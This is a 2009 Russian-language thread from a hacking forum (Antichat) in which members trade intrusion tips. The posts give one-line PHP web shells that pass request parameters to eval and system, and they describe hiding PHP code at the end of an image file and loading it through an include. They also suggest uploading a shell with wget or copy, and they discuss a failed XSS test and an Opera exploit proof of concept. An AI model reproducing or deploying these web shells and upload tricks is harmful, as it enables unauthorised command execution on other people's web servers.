
10.07.2009, 12:47
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
Сообщение от Ershik
Даже если я оставляю сплоит "как есть" - он не вызывает калькулятор. Он подгружает систему и останавливается.
Все дело, в "unescape".
Попробовал сам расшифровывать - либо вбито от балды, либо защита стоит двойная.
Дорогой друг! (=
1. уверены ли Вы что у Вас уязвимая версия оперы, а именно 9.62?
2. Насколько хорошо Вы понимаете принципы работы программ( ну там адресация памяти, машинные инструкции)? Почему вы так уверены, что там просто строка "calc.exe" вбита? ))
3. это конечно PoC, но возможно и в нем есть защита от киддисов.
к сожалению это всё мои домыслы, ибо проверить не могу нет ни подходящей оперы, ни винды.
upd
вот в эту тему советую заглянуть https://forum.antichat.ru/threadnav128650-1-10.html
Последний раз редактировалось geezer.code; 10.07.2009 в 16:38..
|
|
|

09.07.2009, 00:41
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
Кто нибуть может дать пример кода при котором можно выполнять команды с удаленного компьютера?(php сам знаю чуток но не представляю как это должно выглядеть)(интересно просто пощупать это так как с помощью этого взломали 2ip кто помнит(через whois проходила команда любая))
|
|
|

09.07.2009, 00:47
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
PHP код:
<?php eval($_REQUEST); ?>
PHP код:
<?php system($_REQUEST); ?>
Щупай 
|
|
|

09.07.2009, 00:58
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
Сообщение от jokester
PHP код:
<?php eval($_REQUEST); ?>
PHP код:
<?php system($_REQUEST); ?>
Щупай 
а ну так это то понятно!
Но каким методом был взломан через whois(2ip.ru)? Или можно как то whois проверить через командную строку?
|
|
|

09.07.2009, 00:47
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
diznt, смотри сорцы любого шелла.
|
|
|

09.07.2009, 01:08
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
diznt, ну хз, как там был взломан, он, но если там можно выпонлять любые команты, то могли залить шелл, как угодно. "copy", "wget", etc...
|
|
|

09.07.2009, 02:01
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
Ладно...
Такой вопрос... Как залить шелл через картинку?
Пробывал для теста в коментах картинки оставить код <html><script>alert('xss!')</script></html>
Но при переходе на картинку нету xss(
(через ie 6 заходил)
|
|
|

09.07.2009, 11:41
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами:
10485026
Репутация:
1879
|
|
Создал картинку в пэйнте 1 на 1, открыл её блокнотом и в конец с новой строки дописывай php код.
<?php system($_GET['a']); ?> или лучше include($file). Ну и путь до картинки надо бэ знать. Или прямой или через инклуд.
|
|
|

09.07.2009, 12:50
|
|
Познающий
Регистрация: 04.01.2009
Сообщений: 94
С нами:
9131159
Репутация:
145
|
|
Сообщение от Ch3ck
Создал картинку в пэйнте 1 на 1, открыл её блокнотом и в конец с новой строки дописывай php код.
<?php system($_GET['a']); ?> или лучше include($file). Ну и путь до картинки надо бэ знать. Или прямой или через инклуд.
через инклуд нужно ее подгружать
|
|
|

09.07.2009, 16:26
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
Сообщение от Ch3ck
Создал картинку в пэйнте 1 на 1, открыл её блокнотом и в конец с новой строки дописывай php код.
<?php system($_GET['a']); ?> или лучше include($file). Ну и путь до картинки надо бэ знать. Или прямой или через инклуд.
Сам тестил? У меня не пашет (.gif)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|